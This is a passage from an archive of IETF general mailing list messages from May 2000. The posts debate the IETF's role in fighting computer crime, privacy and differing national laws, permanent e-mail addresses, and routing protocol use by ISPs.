>Steven M. Bellovin writes:
>>
>> Right. On the other hand, the AP reports that a French-government
>> sponsored bill would bar anonymous posting to the net. For details,
>> see http://www.techserver.com/noframes/story/0,2294,500207446-500289602-5015
>71097-0,00.html
>
> But should the IETF be fighting this fight? Does the IETF send someone
> to France in hopes of convincing politicians not to do this? Do we have
> the most convincing tongues? The strength of the IETF is in technology.
>
> Right now we don't even have enough resources to go back and update
> RFCs with augmented notes stating how popular implementations differ
> from spec.
>
I wasn't suggesting that we should fight it; I was merely citing it as
an example of governments following their own agendas, regardless of
the underlying technologies.
--Steve Bellovin
>From owner-ietf-outbound Tue May 23 21:10:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA14124
for [EMAIL PROTECTED]; Tue, 23 May 2000 21:10:01 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA14095
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 21:06:02 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id TAA15258
for [EMAIL PROTECTED] env-from <vjs>;
Tue, 23 May 2000 19:06:02 -0600 (MDT)
Date: Tue, 23 May 2000 19:06:02 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Should IETF do more to fight computer crime?
X-Loop: [EMAIL PROTECTED]
> From: "Dawson, Peter D" <[EMAIL PROTECTED]>
> ...
> I agree on the technical reality of tbyte storage/tcpdump etc...
(really technical unreality)
> >Technical reality always trumps political blather everywhere
> >that matters.
>
> Yes, but if I were behind a DMZ and my IDS triggers... and if I got a
> source address .. my question is...
> would 'THe ISP' provide any type of information to negate the threat ? is
> this a political problem?? , beyond technical reality or just plain
> non-compliance to 'Collabration' ???
How do you identify "The ISP"? RFC 2267 is about ingress filtering,
but not egress filtering, logging, flagging, or informing.
If you do trust that the IP source address is valid, then what do you need
with anything more than we've had for decades? Why can't you telephone
a domain contact, and get whatever information or promises of action that
the other guy is willing and able to give?
As for negating threats, regardless of what the apparent source says,
don't you think that the wise course for you is to ensure that your own
defenses render the attack harmless?
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Wed May 24 02:31:04 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA29993
for [EMAIL PROTECTED]; Wed, 24 May 2000 02:30:03 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA29945
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 02:20:38 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4O6Kbn38988;
Wed, 24 May 2000 02:20:37 -0400
Message-Id: <[EMAIL PROTECTED]>
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-reply-to: Your message of "Tue, 23 May 2000 21:22:11 -0000."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Date: Wed, 24 May 2000 02:20:37 -0400
X-Loop: [EMAIL PROTECTED]
On Tue, 23 May 2000 21:22:11 -0000, "Dawson, Peter D" <[EMAIL PROTECTED]>
said:
> lets say a non-student was naughty and was attacking the vt.edu network...
> would you feel satisfied with the answer.. "we're aware of it and that
> action is being taken as per our procedures".... knowing fully well that
> the outage costs is running into a couple of millions on a single site ??
1) As a member of our local CIRT, let me assure you that although
that response usually doesn't give me warm fuzzies, hearing that
action *was* being taken, and being convinced that the people taking
the action were technically clued enough to do it, is at least
something. We recently had one incident, where the source site was
a smallish but not tiny ISP. Turned out they were more than willing
to help, but they were glad that they billed users a flat rate per
month because they didn't have a *clue* how to bill per hour of
connect time because they didn't know where their TAKAX (yes,
that's what they called it - took us a while to decipher it)
logs were going....
2) Much as I'd *love* to be really open with other sites who report
problems with our users, I'm certainly in no mood to have our
legal staff hassling me because I got the university into hot
water by releasing information we weren't allowed to release.
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Wed May 24 03:00:50 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA00291
for [EMAIL PROTECTED]; Wed, 24 May 2000 03:00:03 -0400 (EDT)
Received: from protactinium ([194.73.73.176])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA00261
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 02:54:30 -0400 (EDT)
Received: from [62.7.2.98] (helo=patonmj)
by protactinium with smtp (Exim 2.05 #1)
id 12uV3j-0000cu-00; Wed, 24 May 2000 07:54:27 +0100
From: "mark.paton" <[EMAIL PROTECTED]>
To: "Danny Iacovou" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Subject: RE: IETF *is* computer crime.
Date: Wed, 24 May 2000 07:56:52 +0100
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0000_01BFC555.9FCDF430"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4029.2901
Importance: Normal
X-Loop: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
------=_NextPart_000_0000_01BFC555.9FCDF430
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Danny,
Bob can fuel this arguement this topic for years
and needs no prompting from anyone. Don't get me
wrong technically speaking he's on the ball, but
politically speaking like all technicians suck.
This arguement should be binned and not fueled.
Bob, if you got this mail then give it a rest.
The IETF does a great job and does'nt deserve or
warrent this attack. The people who deserve it
are the politicians who are trying to implement
"laws" on the use of the InterNet, have a go at
them and leave this group alone.
Have a nice now.
Regards
Mark Paton CEO/DIR. Internet Network Eng
Mercury Network Systems Limited
+44 585 649051
+44 1256 761925
http://www.mnsl.org
"Mercury Network Systems - The Unstoppable Force"
This e-mail is intended only for the addressee
named above. As this e-mail may contain
confidential or privileged information if you are
not, or suspect that you are not, the named
addressee or the person responsible for delivering
the message to the named addressee, please
telephone us immediately. Please note that we
cannot guarantee that this message or any
attachment is virus free or has not been
intercepted and amended.
The views of the author may not necessarily
reflect those of the Company.
-----Original Message-----
From: Danny Iacovou
[mailto:[EMAIL PROTECTED]]
Sent: 23 May 2000 20:13
To: Bob Allisat
Cc: [EMAIL PROTECTED]
Subject: Re: IETF *is* computer crime.
Hello Bob,
I think you are being too harsh on the
IETF, ISOC, ICANN, ITU, and
"whatever other unsanctioned, informal
acretion of pseudo-authorities
should arise".
As an example, a group of people decided
to coordinate efforts in order
to communicate with each other. They
agreed on a format for the
correspondance, and they agreed on a
delivery protocol. Before you know
it, email is born. Such efforts are a
good thing. By agreeing with each
other on the mechanics of such a
transaction we've enabled the transaction
to occur (aside from actual implementation).
What wasn't agreed on? Well, one thing
not agreed on is what to do if
correspondance is sent 'anonymously',
containing material that may be of
interest to some authority of law, in
some country (not even connected to
the 'Net at the time email is "standardized").
And of course this is but one possible
scenerio not accounted for by
the standard describing format and
delivery of one particular type
of electronic correspondance. But the
standard never tried to address
any issues it didn't address - it is
complete in what it is. That isn't
anyone's fault, is it? technologists are
technologists, not students of
international law.
The goal of the IETF is to get us from
point A to point B. It isn't to
get us from point A to point B with no
shit (for lack of a better word)
in our way.
------------------------------------------
--------------------------------------
Neophytos Iacovou
University of Minnesota
Academic & Distributed Computing Services
100 Union St. SE
email: [EMAIL PROTECTED]
Minneapolis, MN 55455 USA
------=_NextPart_000_0000_01BFC555.9FCDF430
Content-Type: text/x-vcard;
name="Mark. J.S Paton.vcf"
Content-Disposition: attachment;
filename="Mark. J.S Paton.vcf"
Content-Transfer-Encoding: quoted-printable
BEGIN:VCARD
VERSION:2.1
N:Paton;Mark.;J.S;;
FN:Mark. J.S Paton
ORG:Mnsl;Consultancy
TITLE:Network Design / Support
TEL;WORK;VOICE:+44 0585 649051
TEL;CELL;VOICE:+44 (0585) 649051
ADR;WORK;ENCODING=3DQUOTED-PRINTABLE:;Basingstoke;Willow =
Cottage=3D0D=3D0AReading Road;Mattingley;Hampshire;RG27 8JU;=3D
United Kingdom
LABEL;WORK;ENCODING=3DQUOTED-PRINTABLE:Basingstoke=3D0D=3D0AWillow =
Cottage=3D0D=3D0AReading Road=3D0D=3D0AMattingley, Hampshire=3D
RG27 8JU=3D0D=3D0AUnited Kingdom
URL:
URL:http://www.mnsl.org
EMAIL;PREF;INTERNET:[EMAIL PROTECTED]
REV:19990422T133901Z
END:VCARD
------=_NextPart_000_0000_01BFC555.9FCDF430--
>From owner-ietf-outbound Wed May 24 06:51:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA02071
for [EMAIL PROTECTED]; Wed, 24 May 2000 06:50:02 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id GAA01981
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 06:46:23 -0400 (EDT)
Received: (qmail 22125 invoked from network); 24 May 2000 10:46:22 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 24 May 2000 10:46:22 -0000
Received: (qmail 24117 invoked from network); 24 May 2000 10:46:21 -0000
Received: from ppp-47-125.lander.es (HELO salva) (195.76.47.125)
by lince.lander.es with SMTP; 24 May 2000 10:46:21 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Wed, 24 May 2000 12:53:29 +0200
To: [EMAIL PROTECTED] (Zheng Youquan)
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: Universal & Permanent e-mail address
Cc: [EMAIL PROTECTED]
In-Reply-To: <001a01bfc2c8$c8ddf3a0$ec406fa6@Zhengyq>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Hello Zheng,
At 10:03 21/05/00 +0800, you wrote:
>I want to ask him some questions.
>thank you very much!
>
>
In order to have an universal and permanent e-mail address system wich
allow us to:
No need to know wich is his current ISP.
Less unusefull trafic as we avoid mistakes when somebody changes his ISP.
Not need to check searches engines probabily not updated.
Reduction of ISP change barriers so introduce more competitivity on the
sector then better services and/or lowers prices.
...
And the main reason: not to have more mesages from you asking for your
friends at this list ;-)
Which do you think will be the better solution?:
-Something like postal address, which let us to send e-mails to a person
just knowing i.e. their name and the city in wich he lives, i.e.:
[EMAIL PROTECTED]
(Of course we will need more if there are more than one Scott Shenker at
this city, and some kind of redirect way when he changes his residence city)
-That the users become the owners of their e-mail address, and the ISP have
to redirect the message to the current ISP of Scott.
-Other...
Best Regards,
Salva
>From owner-ietf-outbound Wed May 24 07:01:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA02320
for [EMAIL PROTECTED]; Wed, 24 May 2000 07:00:02 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id GAA01988
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 06:46:29 -0400 (EDT)
Received: (qmail 22150 invoked from network); 24 May 2000 10:46:28 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 24 May 2000 10:46:28 -0000
Received: (qmail 24170 invoked from network); 24 May 2000 10:46:27 -0000
Received: from ppp-47-125.lander.es (HELO salva) (195.76.47.125)
by lince.lander.es with SMTP; 24 May 2000 10:46:27 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Wed, 24 May 2000 12:53:38 +0200
To: africaservice <[EMAIL PROTECTED]>
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: Re: Re-Computer Crime
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Hello Dele,
At 22:56 21/02/00 -0800, you wrote:
>We should know that computer technology is as old as we wanted to
>accept. The whole thing was not meant for public consumption until after
>sometime. Now that it is in the public's domain, many are using the
>system reasonably while others find joy in cracking into the system,
>allow the crackers to go ahead with what they know how to do best, I
>think is a good thing as it will enable computer designers to be more
>security conscious and give us a more secured device if this is the tool
>we will be using in the future.
One thing is to promote a hackers chapionship agains a concrete target, and
something diferent to impulse hackers to atack people computers, please
clarify your position before someone understand that you want he to
manipulate your car in order to improve the hospital skills.
Best Regards,
Salva
>Dele Olawole
>CEO - Africaservice.com
>http://www.africaservice.com
>
>
>
>From owner-ietf-outbound Wed May 24 07:52:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA03553
for [EMAIL PROTECTED]; Wed, 24 May 2000 07:50:03 -0400 (EDT)
Received: from tieke1.tieke.fi (fw.tieke.fi [195.197.205.68])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA03454
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 07:45:24 -0400 (EDT)
Received: by TIEKE1 with Internet Mail Service (5.5.2650.21)
id <LJ3J98PK>; Wed, 24 May 2000 14:45:37 +0200
Message-ID: <621574AE86FAD3118D1D0000E22138A903E6A5@TIEKE1>
From: Erkki Kolehmainen <[EMAIL PROTECTED]>
To: "'Salvador Vidal'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: Universal & Permanent e-mail address
Date: Wed, 24 May 2000 14:45:37 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id HAA03454
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
Dear Mr Vidal,
Since you happened to use helsinky.fi (erroneously for helsinki) in your
example, I decided to inform you of the service for permanent e-mail
addresses that we have in Finland, provided by IKI, The Internet Users
Forever, a not-for-profit association.
The following is an extract from their web pages at http://www.iki.fi.
English summary: The Internet Users Forever IKI is a society that provides
its members, private individuals in Finland, permanent iki.fi-addresses with
e-mail and WWW forwarding services (IKI does not host the web pages, it just
forwards the addresses). This allows our members to keep the same personal
identity should the actual location or ISP of their e-mail or www homepages
change.
Thus, I have a permanent incoming (home) e-mail address at iki.fi, although
my ISP is currently kolumbus.fi (which is also shown on all outgoing traffic
from my home). The system works.
Best regards, EIK
__________________________________________
Erkki I. Kolehmainen
TIEKE Tietotekniikan kehittämiskeskus ry
TIEKE Finnish Information Technology Development Centre
Salomonkatu 17 A, 10th floor, FIN-00100 HELSINKI, FINLAND
Phone: +358 9 4763 0301, Fax: +358 9 4763 0399
http://www.tieke.fi [EMAIL PROTECTED]
-----Original Message-----
From: Salvador Vidal [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 24, 2000 1:53 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Universal & Permanent e-mail address
Hello Zheng,
At 10:03 21/05/00 +0800, you wrote:
>I want to ask him some questions.
>thank you very much!
>
>
In order to have an universal and permanent e-mail address system wich
allow us to:
No need to know wich is his current ISP.
Less unusefull trafic as we avoid mistakes when somebody changes his ISP.
Not need to check searches engines probabily not updated.
Reduction of ISP change barriers so introduce more competitivity on the
sector then better services and/or lowers prices.
...
And the main reason: not to have more mesages from you asking for your
friends at this list ;-)
Which do you think will be the better solution?:
-Something like postal address, which let us to send e-mails to a person
just knowing i.e. their name and the city in wich he lives, i.e.:
[EMAIL PROTECTED]
(Of course we will need more if there are more than one Scott Shenker at
this city, and some kind of redirect way when he changes his residence city)
-That the users become the owners of their e-mail address, and the ISP have
to redirect the message to the current ISP of Scott.
-Other...
Best Regards,
Salva
>From owner-ietf-outbound Wed May 24 08:11:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA04072
for [EMAIL PROTECTED]; Wed, 24 May 2000 08:10:03 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA03747
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 07:59:03 -0400 (EDT)
Received: from langfjella.maxware.no ([193.44.76.100])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id NAA12322;
Wed, 24 May 2000 13:58:22 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Wed, 24 May 2000 13:55:46 +0200
To: "Dawson, Peter D" <[EMAIL PROTECTED]>,
IETF general mailing list <[EMAIL PROTECTED]>
From: Harald Alvestrand <[EMAIL PROTECTED]>
Subject: Privacy (RE: Should IETF do more to fight computer crime?)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 18:27 23.05.2000 +0000, Dawson, Peter D wrote:
>btw, this info would be required on the fly... so that net admin/sec
>would be in a better position to pinpoint the perpetrator's habits/
>physiological profile etc..
the idea that any net admin in the world can be authorized on the fly to
pinpoint my habits, physiological profiles "etc" by an unverified
accusation of suspicion of computer crime does not strike joy into my heart.
I'm glad it's illegal in Norway.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Wed May 24 08:51:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA04805
for [EMAIL PROTECTED]; Wed, 24 May 2000 08:50:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA04681
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 08:41:45 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id FAA22236
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 05:41:15 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AKNGP1>; Wed, 24 May 2000 12:33:52 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: "'IETF general mailing list'" <[EMAIL PROTECTED]>
Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
Date: Wed, 24 May 2000 12:40:44 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
<snip>...
>pinpoint my habits, physiological profiles "etc" by an unverified
^^^^^^^^^^
>accusation of suspicion of computer crime .....
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
So the "unverified accusation" ... should become "verifiable" and this
could only be possible if there is a code of ethics between noc/isp etc...
i.e just what I suggested in my earlier posting...
/pd
>From owner-ietf-outbound Wed May 24 09:31:43 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA05562
for [EMAIL PROTECTED]; Wed, 24 May 2000 09:30:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA05472
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 09:23:30 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id IAA09771;
Wed, 24 May 2000 08:22:57 -0400
Date: Wed, 24 May 2000 08:22:56 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: Harald Alvestrand <[EMAIL PROTECTED]>
Cc: "Dawson, Peter D" <[EMAIL PROTECTED]>,
IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Privacy (RE: Should IETF do more to fight computer crime?)
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <[EMAIL PROTECTED]>; from [EMAIL PROTECTED] on
Wed, May 24, 2000 at 01:55:46PM +0200
X-Loop: [EMAIL PROTECTED]
On Wed, May 24, 2000 at 01:55:46PM +0200, Harald Alvestrand wrote:
> At 18:27 23.05.2000 +0000, Dawson, Peter D wrote:
> >btw, this info would be required on the fly... so that net admin/sec
> >would be in a better position to pinpoint the perpetrator's habits/
> >physiological profile etc..
> the idea that any net admin in the world can be authorized on the fly to
> pinpoint my habits, physiological profiles "etc" by an unverified
> accusation of suspicion of computer crime does not strike joy into my heart.
> I'm glad it's illegal in Norway.
Now throw this mix into the pot...
France just got a court order against Yahoo to force them to
prohibit any auctions of Nazi related memorabilia from reaching French
citizens. It's illegal in France, as is hate speech with is perfectly
legal here in the US. Of course, a large volume of material that is
considered perfectly legal in France, is considered banned and illegal
pornography in the US. France, violence is out, sex is in. US, violence
is in, sex is out. Both have laws to back it up that can cover the net.
Don't know what you've got there in Norway, but I'll bet we
can come up with some delightful contrasts there as well.
The European Union just leap frogged over the US relaxation of
crypto regulations and basically freed up crypto for one and all. The
US is not happy, with appropriate insinuations of it assisting the four
horsemen of the infocalypse.
In this atmosphere where the arguing parties can not even decide
on what IS and IS NOT a crime and where "political crimes" and "thought
crimes" outnumber hard crimes, we should not be talking about throwing
more technology at what is fundamentally NOT a technological problem.
We should be working on solving technological problems and designing
the best technology possible.
At a recent conference on computer crimes, I belive a call was
made for uniform laws and enforcement, or something similar. While
there is the danger of those uniform laws proving to be the lowest
common denominator of the most draconian ones, it also likely to fall
prey to countries and their interests in religiously protecting the
rights and freedoms they cherish most. In the end, I think I would
wait and see what these uniform laws and enforcement end up being, before
I start arguing about what technology would be appropriate to support them.
I would not, however, hold my breath while waiting for this new era
of uniformity and cooperation.
> Harald
> --
> Harald Tveit Alvestrand, EDB Maxware, Norway
> [EMAIL PROTECTED]
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Wed May 24 10:41:47 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA06785
for [EMAIL PROTECTED]; Wed, 24 May 2000 10:40:02 -0400 (EDT)
Received: from mout1.freenet.de ([EMAIL PROTECTED] [194.97.50.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA06752
for <[EMAIL PROTECTED]>; Wed, 24 May 2000 10:37:08 -0400 (EDT)
Received: from [62.104.201.2] (helo=mx1.freenet.de)
by mout1.freenet.de with esmtp (Exim 3.14 #3)
id 12ucCU-0007LD-00; Wed, 24 May 2000 16:31:59 +0200
Received: from [62.104.198.141] (helo=canna)
by mx1.freenet.de with smtp (Exim 3.14 #3)
id 12ucCP-0000O4-00; Wed, 24 May 2000 16:31:53 +0200
Reply-To: <[EMAIL PROTECTED]>
From: "Andre Dieball" <[EMAIL PROTECTED]>
To: "David Wang" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: RE: MPLS and IS-IS
Date: Wed, 24 May 2000 16:27:05 +0200
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
In-Reply-To: <D7F6115661E9D311834F006008F5C83C09639B@MAILHOST>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi
>
> 2. Besides UUNET, which ISPs run IS-IS protocol? Can you name a few? or
> what percentage of networks run IS-IS instead of OSPF?
MobilCOM City LINE, on IP and ATM
Mit freundlichen Gruessen
Yours faithfully
Andre Dieball
----------------------------------------------------------------------
MobilCOM City LINE GmbH
WAN Switching phone: +49 4331 69-1229
Hollerstr. 126 fax: +49 4331 69-2260
24782 Buedelsdorf email: [EMAIL PROTECTED]
GERMANY http://www.mobilcom.de
PGP: 540E 4D84 C070 811C 2F49 3799 7E17 77EB
----------------------------------------------------------------------
>
> Thanks
> David
>
>
> -----Original Message-----
> From: HANSEN CHAN [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, May 16, 2000 7:22 AM
> To: [EMAIL PROTECTED]
> Subject: MPLS and IS-IS
>
>
> Hi all,
>
> I have been hearing IS-IS is a better protocol to be used than OSPF in a
> MPLS
> network for TE application. Is that a fair statement? What are
> the technical
> reasons?
>
> Appreciate if someone can shed some light on this subject.
>
> Thanks,
> Hansen
>
>
>From owner-ietf-outbound Thu May 25 04:41:40 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA01985
for [EMAIL PROTECTED]; Thu, 25 May 2000 04:40:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA01870
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 04:30:02 -0400 (EDT)
Received: from langfjella.maxware.no ([193.44.76.100])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id KAA20692;
Thu, 25 May 2000 10:29:56 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Wed, 24 May 2000 15:45:28 +0200
To: "Dawson, Peter D" <[EMAIL PROTECTED]>,
"'IETF general mailing list'" <[EMAIL PROTECTED]>
From: Harald Alvestrand <[EMAIL PROTECTED]>
Subject: RE: Privacy (RE: Should IETF do more to fight computer crime?)
In-Reply-To: <[EMAIL PROTECTED]
ld.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 12:40 24.05.2000 +0000, Dawson, Peter D wrote:
>So the "unverified accusation" ... should become "verifiable" and this
>could only be possible if there is a code of ethics between noc/isp etc...
>i.e just what I suggested in my earlier posting...
RFC 2350 and draft-ietf-grip-isp-expectations, and other GRIP documents are
the furthest the IETF has come in addressing the "code of ethics" problem.
It's a start; we've proved that getting anywhere in this direction causes a
great deal of discussion, and that expectations vary greatly.
The group is still open, and welcomes volunteers.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 25 05:30:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA02341
for [EMAIL PROTECTED]; Thu, 25 May 2000 05:30:02 -0400 (EDT)
Received: from mailsrvnt01.ssdi.sharp.co.in ([203.197.160.35])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA02318
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 05:28:37 -0400 (EDT)
Received: by mailsrvnt01.ssdi.sharp.co.in with Internet Mail Service (5.5.2650.21)
id <K44CV361>; Thu, 25 May 2000 15:05:02 +0530
Message-ID: <[EMAIL PROTECTED]>
From: Sriram Shanmugam <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Configuration...
Date: Thu, 25 May 2000 15:04:53 +0530
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Hai ,
I am developing a configuration software which should assign an IP
address for a network device which is connected to the network for the
first time through my program .
What is the procedure ? , should i use bootp or DHCP or ARP , please
do advice me .In case I assign only IP address in my configuration
application , can i write a common configuration software which can be used
to configure for HP , Lexmark , sharp etc etc.
Thanks in advance,
Regards,
S.Sriram
>From owner-ietf-outbound Thu May 25 06:30:29 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA02725
for [EMAIL PROTECTED]; Thu, 25 May 2000 06:30:01 -0400 (EDT)
Received: from fsnt.future.futusoft.com ([203.197.140.35])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA02677
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 06:21:44 -0400 (EDT)
Received: from kailash.future.futsoft.com (unverified) by fsnt.future.futusoft.com
(Content Technologies SMTPRS 2.0.15) with ESMTP id
<[EMAIL PROTECTED]>;
Thu, 25 May 2000 16:01:46 +0530
Received: from ravicm.future.futsoft.com (ravicm.future.futsoft.com [10.0.14.2]) by
kailash.future.futsoft.com (8.7.1/8.7.1) with SMTP id PAA03179; Thu, 25 May 2000
15:37:56 +0530
Received: by localhost with Microsoft MAPI; Thu, 25 May 2000 15:40:33 +0530
